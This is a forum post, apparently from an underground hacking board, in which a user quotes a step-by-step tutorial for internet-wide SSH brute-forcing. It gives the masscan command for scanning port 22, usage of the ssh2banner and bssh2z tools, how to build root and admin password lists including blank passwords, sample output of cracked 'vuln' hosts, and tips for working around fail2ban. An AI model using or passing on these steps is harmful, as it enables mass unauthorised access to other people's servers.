![]() |
Hi just wanted to ask if you can help me i got a tut for ssh cracking But can seen to understand which command to press step by step the way this tool works This is how the tool works 1 scan for open 22 ip 2 you have to scan the ip for servers banners 3 then you start the cracking to get ip i use this ./masscan $1 -p22 -oL input.txt --max-rate $masscan_speed --open --banners --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8 -sS -Pn -n --randomize-hosts -v --send-eth ./ss 22 -a 110 eth0 -s 10 That part i understand Theres two part im not understanding is commands for ./ssh2banner and ./bssh2z this is what im not sure is (./ssh2banner <VIPCODE>) and for (./bssh2z YOUR_VIPCODE_PASSWORDhttps://txgate.io/images/smilies/wink.gif i google it and cant find anything ./ssh2banner <FORKS> <PORT> <TIMEOUT> <VIPCODE> ./ssh2banner 150 22 10 ./bssh2z <FORKS> <PORT> <TIMEOUT> <VIPCODE> ./bssh2z 150 22 10 YOUR_VIPCODE_PASSWORD; ICQ 680864860 Thats the tut ************************************************** ************************************************** ******************************************* INFO.TXT 1. ssh2banner is for retriving the banner of the ssh server. The good thing is that you don't even need u/p, thus making this a very good tool of determining if is a proper ssh server INPUT FILE = `i` 1.2.3.4 3.3.3.3 4.4.4.4 OUTPUT 1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu 3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2 4.4.4.4:22:SSH-WHATEVER_BANNER EXAMPLE RUN ./ssh2banner <FORKS> <PORT> <TIMEOUT> <VIPCODE> So we have the bios.txt that containts a list of ips that have port 22 opened it is time to put it to the check with ssh2banner. (banner ssh will read `i` file, also shuffeling ips) cat bios.txt | sort -u | shuf > i ./ssh2banner 150 22 10 YOUR_VIPCODE_PASSWORD; We will use 150 forks (max ssh connection at a time), but you can put whatever number you want(500,1000), be carefull to not get your server banned or in ram/cpu load. The ssh2banner is way faster then the bssh2z (brute-ssh) because it is just connecting to the server and getting the ssh-banner only without username/passowrd. It will generate an `banners.log` file that will contain data like this : 1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu 3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2 4.4.4.4:22:SSH-WHATEVER_BANNER You will see a lot of banners, starting from OpenSSH to dropbear or some that you even heared about, like routers and other stuff. This list is perfect to do a brute-SSH attack on it, thus you are 100% that those are servers and not some other applications that are opened on port 22. Retrieve just the ips from this list with this command : rm i; cat banners.log | cut -f ":" -f 1 > i; if you wish you can scan only dropbear cat banners.log | grep "dropbear" | cut -f ":" -f 1 > i; or cisco routers cat banners.log | grep "cisco" | cut -f ":" -f 1 > i; Create a nice password file `p` begining with the user/pass combo "root $BLANKPASS", should look like this : root $BLANKPASS admin admin username password ... then do a wc -l i p 233214 i 18 p 233232 total Looks ok 2. bssh2z (brute ssh) is for brute-forcing list of ips with various passwords INPUT FILE (list of ips) = `i` 1.2.3.4 3.3.3.3 4.4.4.4 INPUT FILE (list of user/pass combo) = `p` root $BLANKPASS admin admin user pass OUTPUT `n` -> nobash,busybox,honeypot,other linux root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5 `v` -> vuln,virtual,good linux root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln EXAMPLE RUN ./bssh2z <FORKS> <PORT> <TIMEOUT> <VIPCODE> If you put like 20 ips and 400 passwords and the scan works slow, don't worry, it is a fail2ban protection. It is pointless to finish them in 1 minute, thus you will get banned after the first 5 tries in less then a minute. It will finish it, have patience. Now we will do a brute-SSH attack on those using this command ./bssh2z 150 22 10 YOUR_VIPCODE_PASSWORD; You will see something like this going on: Current version : 2.5.1 Last version : 2.4.1 Counting PASS Counted [18] PASS Counting IPS Counted [233214] IPS There are [4197852] possible combinations Starting session 0 Trying user/pass combo #1->[guest][] Combo [9 of 4197852] -> [178.27.29.115] with [guest][] Combo [4 of 4197852] -> [220.128.68.129] with [guest][] ... Duplicate NOBASH [128.54.202.72] Duplicate NOBASH [37.48.86.100] Combo [53262 of 4197852] -> [67.221.173.53] with [guest][] .... ************************************************** ************************************************** ******************************************* </img> |
All times are GMT. The time now is 06:29 PM. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.